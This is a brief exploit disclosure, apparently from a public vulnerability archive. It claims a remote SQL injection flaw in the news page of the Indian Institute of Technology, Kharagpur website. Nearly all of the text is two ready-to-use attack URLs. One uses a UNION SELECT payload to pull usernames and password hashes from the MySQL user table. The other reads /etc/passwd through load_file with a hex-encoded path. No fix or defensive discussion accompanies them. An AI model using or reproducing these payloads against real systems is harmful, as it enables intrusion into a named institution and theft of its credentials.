-----------------------------------------------------------------------------------------------

[+] Indian Institute of Technology, Kharagpur suffers from a remote SQL
injection vulnerability
[+] Author: Rohit Bansal

---------------------------------------------------------------------------------------
http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20convert(concat(user,0x3a,password)%20using%20latin1)%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+--<http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20convert%28concat%28user,0x3a,password%29%20using%20latin1%29%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+-->


http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20load_file(0x2F6574632F706173737764)%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+--<http://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20load_file%280x2F6574632F706173737764%29%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+-->


---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec
---------------------------------------------------------------------------------------